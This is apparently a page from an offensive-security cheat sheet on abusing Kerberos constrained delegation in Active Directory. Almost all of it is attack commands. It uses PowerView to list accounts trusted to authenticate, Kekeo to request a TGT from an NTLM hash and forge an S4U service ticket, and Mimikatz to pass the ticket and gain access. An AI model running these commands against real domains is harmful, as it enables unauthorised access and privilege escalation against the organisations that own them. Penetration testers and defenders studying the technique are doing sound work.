CONSTRAINED DELEGATION

Enumerate users with Constrained Delegation enabled

Get-DomainUser -TrustedToAuth
 
Get-DomainUser -TrustedToAuth | Select -ExpandProperty samaccountname

Get-DomainUser -TrustedToAuth | Select  samaccountname,useraccountcontrol

Using Kekeo to request a TGT for the constrained delegated service

tgt::ask /user:<CONSTRAINED SERVICE> /domain:<DOMAIN> /rc4:<NTLM>

Requesting a TGS for target service from our constrained service ticket

tgs::s4u /tgt:<TGT PATH> /user:<USERNAME> /service:<SPN>

Performing Pass The Ticket attack with mimikatz to gain access

Invoke-Mimikatz -Command '"kerberos::ptt <TGS PATH>"'
PreviousUNCONSTRAINED DELEGATIONNextTRUST BASED DOMAIN ATTACKS

Last updated